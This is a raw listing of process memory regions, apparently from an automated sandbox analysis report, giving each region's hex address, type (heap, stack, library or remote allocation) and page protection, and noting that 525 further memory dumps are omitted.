1B470C72000 | heap | page read and write
1B470C80000 | heap | page read and write
9270C0B000 | stack | page read and write
8B30000 | trusted library allocation | page execute and read and write
3110000 | trusted library allocation | page read and write
4DD2000 | trusted library allocation | page read and write
1B470B24000 | heap | page read and write
1B470C46000 | heap | page read and write
926F5F3000 | stack | page read and write
BC8000 | stack | page read and write
926F97E000 | stack | page read and write
1B832FE000 | stack | page read and write
1B470C21000 | heap | page read and write
8AE0000 | direct allocation | page read and write
1B46EE01000 | heap | page read and write
1DE87EF0000 | trusted library allocation | page read and write
4C4E000 | stack | page read and write
5D71000 | trusted library allocation | page read and write
7FFE7E1D0000 | trusted library allocation | page read and write
1DEA2168000 | heap | page read and write
926FAFE000 | stack | page read and write
926FCB6000 | stack | page read and write
1B46EF48000 | heap | page read and write
1DE8B2AE000 | trusted library allocation | page read and write
8580000 | heap | page read and write
1DE8B218000 | trusted library allocation | page read and write
1A59FF40000 | heap | page read and write
1B470CA5000 | heap | page read and write
1B470C57000 | heap | page read and write
3300000 | heap | page read and write
1DEA1957000 | heap | page read and write
1B470C78000 | heap | page read and write
1B470C78000 | heap | page read and write
1B46EDFF000 | heap | page read and write
926FB7E000 | stack | page read and write
8805000 | trusted library allocation | page read and write
1DEA20CB000 | heap | page read and write
1DEA20D3000 | heap | page read and write
84AE000 | stack | page read and write
3140000 | trusted library allocation | page read and write
3142000 | trusted library allocation | page read and write
1B470C80000 | heap | page read and write
1B470C3B000 | heap | page read and write
1B470B37000 | heap | page read and write
7960000 | trusted library allocation | page read and write
7FFE7DEE2000 | trusted library allocation | page read and write
84EE000 | stack | page read and write
1B46EF48000 | heap | page read and write
1DE89FA7000 | trusted library allocation | page read and write
1DEA2142000 | heap | page read and write
1B46ECB0000 | heap | page read and write
1B470B53000 | heap | page read and write
1B470CA5000 | heap | page read and write
1B46EF48000 | heap | page read and write
926FE3E000 | stack | page read and write
1B470B28000 | heap | page read and write
1B470D45000 | heap | page read and write
1DEA2164000 | heap | page read and write
3188000 | heap | page read and write
1DE8B7E7000 | trusted library allocation | page read and write
1B470B20000 | heap | page read and write
926FBF8000 | stack | page read and write
1DE89DD8000 | trusted library allocation | page read and write
1B470DF4000 | heap | page read and write
1B46EE01000 | heap | page read and write
5D99000 | trusted library allocation | page read and write
7A9C000 | stack | page read and write
1B470C49000 | heap | page read and write
1DE89DCD000 | trusted library allocation | page read and write
32F4000 | heap | page read and write
1B470C57000 | heap | page read and write
7FFE7E270000 | trusted library allocation | page read and write
1DEA2151000 | heap | page read and write
1DEA215B000 | heap | page read and write
320F000 | stack | page read and write
7FFE7E000000 | trusted library allocation | page execute and read and write
1B46ED9F000 | heap | page read and write
1B470CE6000 | heap | page read and write
1B470B4A000 | heap | page read and write
1B46ED70000 | heap | page read and write
8A00000 | trusted library allocation | page read and write
4D71000 | trusted library allocation | page read and write
1B470C46000 | heap | page read and write
1DE87F76000 | heap | page read and write
3356000 | heap | page read and write
1B470B28000 | heap | page read and write
32AE000 | stack | page read and write
7FFE7E1C0000 | trusted library allocation | page read and write
3129000 | trusted library allocation | page read and write
3363000 | heap | page read and write
1B470C38000 | heap | page read and write
8790000 | trusted library allocation | page read and write
30F0000 | trusted library section | page read and write
926FC3F000 | stack | page read and write
1DE87F00000 | heap | page execute and read and write
1B470D70000 | heap | page read and write
7F310000 | trusted library allocation | page execute and read and write
7FFE7E120000 | trusted library allocation | page read and write
7FFE7DFA0000 | trusted library allocation | page execute and read and write
4CD0000 | heap | page read and write
7FFE7E210000 | trusted library allocation | page read and write
7680000 | heap | page read and write
89F0000 | trusted library allocation | page execute and read and write
926FFBE000 | stack | page read and write
7A30000 | trusted library allocation | page read and write
7850000 | heap | page execute and read and write
73B0000 | heap | page read and write
1B46EDDC000 | heap | page read and write
1B470B21000 | heap | page read and write
1B470CD5000 | heap | page read and write
789E000 | stack | page read and write
1B46ED9A000 | heap | page read and write
1B470C72000 | heap | page read and write
1B82AFE000 | stack | page read and write
1DE8B6E2000 | trusted library allocation | page read and write
1B46EDA0000 | heap | page read and write
1DE898D0000 | heap | page read and write
1B470C53000 | heap | page read and write
9FEB000 | direct allocation | page execute and read and write
7FFE7DEED000 | trusted library allocation | page execute and read and write
8586000 | heap | page read and write
1B470B53000 | heap | page read and write
1B470CD6000 | heap | page read and write
1B46EE53000 | heap | page read and write
1B46EE0E000 | heap | page read and write
1B46EDA0000 | heap | page read and write
1DE89920000 | heap | page execute and read and write
E40000 | heap | page read and write
1DE8B705000 | trusted library allocation | page read and write
1B46EDAF000 | heap | page read and write
1B470C78000 | heap | page read and write
7FFE7DEF0000 | trusted library allocation | page read and write
1DEA2154000 | heap | page read and write
8588000 | heap | page read and write
1B470B53000 | heap | page read and write
7FFE7E1A0000 | trusted library allocation | page read and write
1B470C57000 | heap | page read and write
1B470C57000 | heap | page read and write
8540000 | trusted library allocation | page read and write
1B470DF6000 | heap | page read and write
79E0000 | trusted library allocation | page read and write
7FFE7DEE0000 | trusted library allocation | page read and write
1DE8B6D1000 | trusted library allocation | page read and write
7FFE7E100000 | trusted library allocation | page read and write
1B46EF45000 | heap | page read and write
1B470CEE000 | heap | page read and write
3334000 | heap | page read and write
1DE89DE5000 | trusted library allocation | page read and write
1B470B2B000 | heap | page read and write
7970000 | trusted library allocation | page execute and read and write
1DE87F5C000 | heap | page read and write
8550000 | trusted library allocation | page read and write
3218000 | trusted library allocation | page read and write
1DE87FA3000 | heap | page read and write
1B470C48000 | heap | page read and write
1DE89940000 | heap | page read and write
1B470C51000 | heap | page read and write
1B470C95000 | heap | page read and write
1B46EDBC000 | heap | page read and write
894C000 | stack | page read and write
32B0000 | trusted library allocation | page execute and read and write
1DEA1E47000 | heap | page execute and read and write
1DE87F55000 | heap | page read and write
7FFE7E1E0000 | trusted library allocation | page read and write
79C0000 | trusted library allocation | page read and write
1B470B53000 | heap | page read and write
1B470CC2000 | heap | page read and write
7FFE7DEFB000 | trusted library allocation | page read and write
1B46EEA0000 | remote allocation | page read and write
1DE881B0000 | trusted library allocation | page read and write
1B470B2E000 | heap | page read and write
795D000
stack
page read and write
4CC0000
heap
page execute and read and write
1B470C40000
heap
page read and write
8520000
trusted library allocation
page read and write
1DE8B6E4000
trusted library allocation
page read and write
1B470C95000
heap
page read and write
1DE87FEB000
heap
page read and write
1B470B2F000
heap
page read and write
1B470C57000
heap
page read and write
1DEA1E6E000
heap
page read and write
3160000
trusted library allocation
page read and write
1A59FF45000
heap
page read and write
85BF000
heap
page read and write
73CB000
heap
page read and write
1B470CA5000
heap
page read and write
7FFE7DEE3000
trusted library allocation
page execute and read and write
3336000
heap
page read and write
1B46EDC9000
heap
page read and write
926F87E000
stack
page read and write
926FA7E000
stack
page read and write
1B46EE62000
heap
page read and write
5338000
trusted library allocation
page read and write
1B470C80000
heap
page read and write
1B46EE60000
heap
page read and write
1DEA1F70000
heap
page read and write
1DEA20C6000
heap
page read and write
1B82FFB000
stack
page read and write
1B470C20000
heap
page read and write
1B470CA5000
heap
page read and write
1B46EED0000
heap
page read and write
30C0000
heap
page read and write
1DE8B300000
trusted library allocation
page read and write
7FFE7E0A0000
trusted library allocation
page execute and read and write
1B470CC7000
heap
page read and write
B8C000
stack
page read and write
1B470B27000
heap
page read and write
1B470D9E000
heap
page read and write
7FFE7E130000
trusted library allocation
page read and write
890C000
stack
page read and write
1DEA1F2F000
heap
page read and write
84F0000
trusted library allocation
page execute and read and write
1B470B53000
heap
page read and write
7990000
trusted library allocation
page read and write
1B470D9F000
heap
page read and write
1B470CF9000
heap
page read and write
1DEA212E000
heap
page read and write
1B46EE10000
heap
page read and write
1B470CD7000
heap
page read and write
1B46EE53000
heap
page read and write
76B3000
heap
page read and write
1B470C95000
heap
page read and write
7A40000
trusted library allocation
page execute and read and write
4C0F000
stack
page read and write
1B470C95000
heap
page read and write
7FFE7E240000
trusted library allocation
page read and write
1B470CC4000
heap
page read and write
79B0000
trusted library allocation
page read and write
1B46EDFF000
heap
page read and write
4BCE000
stack
page read and write
4D68000
heap
page read and write
76CA000
heap
page read and write
1B470C57000
heap
page read and write
1B46EE27000
heap
page read and write
3113000
trusted library allocation
page execute and read and write
1DE8A4CD000
trusted library allocation
page read and write
1B470CA9000
heap
page read and write
1B470C51000
heap
page read and write
4134D7F000
stack
page read and write
30E0000
trusted library section
page read and write
7FFE7E190000
trusted library allocation
page read and write
1DE87FDE000
heap
page read and write
761F000
stack
page read and write
1B470CD0000
heap
page read and write
1B470C72000
heap
page read and write
78DE000
stack
page read and write
1B470C95000
heap
page read and write
1B470CA9000
heap
page read and write
7A50000
trusted library allocation
page read and write
1B470D70000
heap
page read and write
1A59FC50000
heap
page read and write
4C8E000
stack
page read and write
1A59FC66000
heap
page read and write
1DE8A2C9000
trusted library allocation
page read and write
926F8FE000
stack
page read and write
3145000
trusted library allocation
page execute and read and write
7265000
heap
page execute and read and write
1DEA1EA6000
heap
page read and write
1DE881C0000
heap
page read and write
1DE8A4F7000
trusted library allocation
page read and write
1DE87ED0000
trusted library allocation
page read and write
1B46EE32000
heap
page read and write
1DEA2050000
heap
page read and write
1B82DFF000
stack
page read and write
1B470C57000
heap
page read and write
1B470B2F000
heap
page read and write
9270A0F000
stack
page read and write
1DE87E50000
heap
page read and write
7FFE7DEE4000
trusted library allocation
page read and write
1DEA1E40000
heap
page execute and read and write
1B470C53000
heap
page read and write
1B470C72000
heap
page read and write
1DE87F1D000
heap
page read and write
1B46EE62000
heap
page read and write
1B46ECD0000
heap
page read and write
1B470CB2000
heap
page read and write
7FFE7E0C7000
trusted library allocation
page read and write
85B3000
heap
page read and write
1DE99C47000
trusted library allocation
page read and write
31CE000
stack
page read and write
8500000
heap
page read and write
1A59FE40000
heap
page read and write
1B46EEA0000
remote allocation
page read and write
1A59FC59000
heap
page read and write
1B470CA5000
heap
page read and write
1B470C93000
heap
page read and write
7FFE7E160000
trusted library allocation
page read and write
1DE8B6F0000
trusted library allocation
page read and write
7FFE7DF96000
trusted library allocation
page read and write
5DD6000
trusted library allocation
page read and write
7A20000
trusted library allocation
page read and write
1DE87E90000
heap
page read and write
1B470C78000
heap
page read and write
8770000
trusted library allocation
page read and write
1B470DF0000
heap
page read and write
1B470CD0000
heap
page read and write
1B470CA9000
heap
page read and write
1B470CA9000
heap
page read and write
F60000
heap
page read and write
1B470C3E000
heap
page read and write
1B470B53000
heap
page read and write
1B470B53000
heap
page read and write
79A0000
trusted library allocation
page read and write
1B470CF0000
heap
page read and write
1B470CD3000
heap
page read and write
1B470CB9000
heap
page read and write
1DE8B246000
trusted library allocation
page read and write
1B470CB2000
heap
page read and write
1B46EE0A000
heap
page read and write
525 additional memdumps not shown.